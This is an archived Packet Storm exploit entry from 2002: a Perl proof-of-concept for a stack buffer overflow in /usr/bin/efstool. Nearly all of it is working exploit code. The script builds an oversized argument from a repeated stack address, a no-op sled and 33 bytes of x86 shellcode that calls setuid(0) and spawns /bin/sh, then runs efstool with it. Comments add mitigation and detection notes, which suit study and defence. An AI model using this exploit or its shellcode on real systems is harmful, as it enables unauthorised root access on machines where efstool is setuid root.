efstool.pl

2002-09-11T00:00:00
ID PACKETSTORM:29616
Type packetstorm
Reporter user_15335@erato.uk.clara.net
Modified 2002-09-11T00:00:00

Description

                                        
                                            ` #!/usr/bin/perl  
# Another efstool exploit
#
# Purpose: local proof-of-concept that assembles one oversized command-line
# argument and runs /usr/bin/efstool with it. The script implies that efstool
# copies this argument into a fixed-size stack buffer without a length check;
# the page does not name the vulnerable code path -- confirm against the
# vendor advisory before relying on that description.
#
# Usage: an optional single argument is an integer offset added to $ret.
#
# Defender notes:
#  - The payload calls setuid(0) before spawning a shell, which only yields
#    extra privilege when efstool is installed setuid root. Auditing the mode
#    bits of /usr/bin/efstool and clearing the setuid bit (or removing or
#    updating the package) is the direct mitigation.
#  - The argument has a distinctive shape: 3000 bytes of one repeated 4-byte
#    value, 1867 bytes of 0x90, then 33 bytes of code (4900 bytes in total).
#    Process-execution audit records showing efstool started with a
#    multi-kilobyte argv[1] are a usable detection signal.
#  - The script depends on a hard-coded stack address and on code placed on
#    the stack, so stack address randomisation and a non-executable stack
#    each defeat it as written.
  
# 33 bytes of 32-bit Linux/x86 machine code using int 0x80 system calls:
# setuid(0) (syscall 0x17), then execve (syscall 0x0b) of "//bin/sh".
$shell =   
"\x31\xc0\xb0\x17\x31\xdb\xcd\x80\x31\xc0\x50\x89".  
"\xe2\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89".  
"\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";  
  
  
# Hard-coded guess at a stack address; the 0xbfff.... range suggests a 32-bit
# Linux user stack -- presumably chosen to fall inside the 0x90 run below.
$ret =0xbfffe590;  
# Number of bytes filled with the repeated address (750 four-byte copies).
$buf = 3000;  
# Size budget for the 0x90 run plus the machine code, before the 100-byte
# reduction applied in the second loop.
$egg = 2000;  
# x86 single-byte no-op instruction.
$nop = "\x90";  
# Adjustment added to $ret; stays 0 unless one argument is supplied.
$offset = 0;  
  
if (@ARGV == 1) { $offset = $ARGV[0]; }  
  
# 'l' packs a 32-bit value in the host's native byte order.
$addr = pack('l', ($ret + $offset));  
# First segment: the packed address repeated until $buf bytes are written.
for ($i = 0; $i < $buf; $i += 4) {  
$buffer .= $addr;  
}  
  
# Second segment: $egg - length($shell) - 100 = 1867 no-op bytes.
for ($i = 0; $i < ($egg - length($shell) - 100); $i++) {  
$buffer .= $nop;   
}   
  
# Final segment: the machine code itself, placed after the no-op run.
$buffer .= $shell;   
# exec() replaces this Perl process with efstool, passing the assembled bytes
# as its argument; nothing after this line runs if exec succeeds.
exec("/usr/bin/efstool $buffer");  
`